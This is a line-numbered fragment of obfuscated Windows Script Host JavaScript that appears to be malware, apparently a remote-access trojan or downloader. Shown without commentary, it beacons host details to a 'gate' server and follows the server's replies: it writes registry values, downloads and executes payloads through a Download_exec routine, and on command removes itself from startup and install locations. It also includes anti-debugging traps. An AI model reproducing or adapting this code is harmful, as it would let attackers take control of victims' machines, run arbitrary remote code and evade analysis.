| 252 | ! _0x522cd6['test'] ( _0x4ff68c + _0x5b1a0b ( '0x166' ) ) || ! _0x82cad1[_0x5b1a0b ( 0x18f ) ] ( _0x4ff68c + _0x5b1a0b ( '0x142' ) ) ? _0x4ff68c ( '0' ) : _0x2150f9 ( ); | |
| 253 | } ) ( ); | |
| 254 | } ( ) ); | |
| 255 | try | |
| 256 | { | |
| 257 | var _0x3d06b9 = shellobj[_0x22eae4 ( '0x147' ) ] ( SaveSettings ); | |
| 258 | } | |
| 259 | catch ( _0xcb3062 ) | |
| 260 | { | |
| 261 | var _0x3d06b9 = ''; | |
| 262 | } | |
| 263 | var _0x415288 = new ActiveXObject ( _0x22eae4 ( '0x164' ) ); | |
| 264 | _0x415288[_0x22eae4 ( '0x149' ) ] ( _0x22eae4 ( 0x176 ), gate, ! [] ), _0x415288['setRequestHeader'] ( _0x22eae4 ( 0x140 ), user_agent ), _0x415288[_0x373146 ( '0x181', ')q)E' ) ] ( _0x22eae4 ( '0x16f' ), _0x22eae4 ( 0x182 ) ); | |
| 265 | if ( _0x3d06b9[_0x373146 ( '0x152', 'DH)J' ) ] < 0x8 ) | |
| 266 | var _0x477ace = _0x373146 ( '0x14b', 'DH)J' ); | |
| 267 | else | |
| 268 | var _0x477ace = ''; | |
| 269 | _0x415288[_0x22eae4 ( '0x13b' ) ] ( _0x373146 ( '0x168', '9]ID' ) + shellobj[_0x22eae4 ( '0x190' ) ] ( _0x22eae4 ( 0x177 ) ) + '|' + _0x3d06b9 + _0x373146 ( 0x173, '$G#%' ) + _0x477ace ); | |
| 270 | var _0x115c69 = _0x415288[_0x22eae4 ( '0x16e' ) ], _0x3fb45b = _0x115c69[_0x22eae4 ( '0x17a' ) ] ( '|' ); | |
| 271 | switch ( _0x3fb45b[0x0] ) { | |
| 272 | case '00' : | |
| 273 | shellobj['RegWrite'] ( SaveSettings, _0x3fb45b[0x1], _0x22eae4 ( '0x157' ) ); | |
| 274 | break ; | |
| 275 | case '01' : | |
| 276 | Download_exec ( _0x3fb45b[0x1], 0x0 ); | |
| 277 | break ; | |
| 278 | case '03' : | |
| 279 | Download_exec ( _0x3fb45b[0x1], 0x1 ); | |
| 280 | break ; | |
| 281 | case '19' : | |
| 282 | shellobj['regdelete'] ( HKCU + WSH[_0x373146 ( '0x161', '$G#%' ) ][_0x22eae4 ( '0x17a' ) ] ( '.' ) [0x0] ), filesystemobj['deletefile'] ( startup + WSH[_0x22eae4 ( 0x15f ) ], ! ! [] ), filesystemobj['deletefile'] ( installdir + WSH['scriptname'], ! ! [] ), shellobj[_0x373146 ( '0x17b', 'i(]w' ) ] ( SaveSettings ), WSH[_0x22eae4 ( '0x143' ) ] ( ); | |
| 283 | break ; | |
| 284 | } | |
| 285 | } | |
| 286 | function sleep(_0x2c0b28) { | |
| 287 | var _0x2f1f4c = _0x4f83db, _0x3087a4 = new Date ( ) [_0x2f1f4c ( '0x13c', 'tSe#' ) ] ( ); | |
| 288 | for ( var _0x1c89e7 = 0x0 ; _0x1c89e7 < 0x989680 ; _0x1c89e7 ++ ) | |
| 289 | { | |
| 290 | if ( new Date ( ) ['getTime'] ( ) - _0x3087a4 > _0x2c0b28 ) | |
| 291 | break ; | |
| 292 | } | |
| 293 | } | |
| 294 | function _0x2150f9(_0x5ba605) { | |
| 295 | function _0x35b8c4(_0x586539) { | |
| 296 | var _0x397bed = _0x26ae, _0x4b3546 = _0x1fc1; | |
| 297 | if ( typeof _0x586539 === 'string' ) | |
| 298 | return function (_0x54187a) {
}['constructor'] ( 'while\x20(true)\x20{}' ) [_0x4b3546 ( '0x163', '8p52' ) ] ( 'counter' ); | |
| 299 | else | |
| 300 | ( '' + _0x586539 / _0x586539 )[_0x4b3546 ( 0x15a, 'Y!nA' ) ] !== 0x1 || _0x586539 % 0x14 === 0x0 ? function () {
return ! ! [ ];}[_0x4b3546 ( '0x138', 'HQ15' ) ] ( 'debu' + _0x4b3546 ( '0x144', 'ySE2' ) ) [_0x397bed ( 0x158 ) ] ( _0x4b3546 ( '0x183', 'uBWS' ) ) : function () {
return ! [ ];}[_0x397bed ( '0x179' ) ] ( _0x397bed ( '0x174' ) + _0x4b3546 ( '0x13f', 'i(]w' ) ) [_0x4b3546 ( 0x151, '2kiA' ) ] ( _0x4b3546 ( '0x178', 'U!CQ' ) ); | |
| 301 | _0x35b8c4 ( ++ _0x586539 ); | |
| 302 | } | |
| 303 | try | |
| 304 | { | |
| 305 | if ( _0x5ba605 ) | |
| 306 | return _0x35b8c4; | |
| 307 | else | |
| 308 | _0x35b8c4 ( 0x0 ); | |
| 309 | } | |
| 310 | catch ( _0x1607e6 ) | |
| 311 | { | |
| 312 | } | |
| 313 | } | |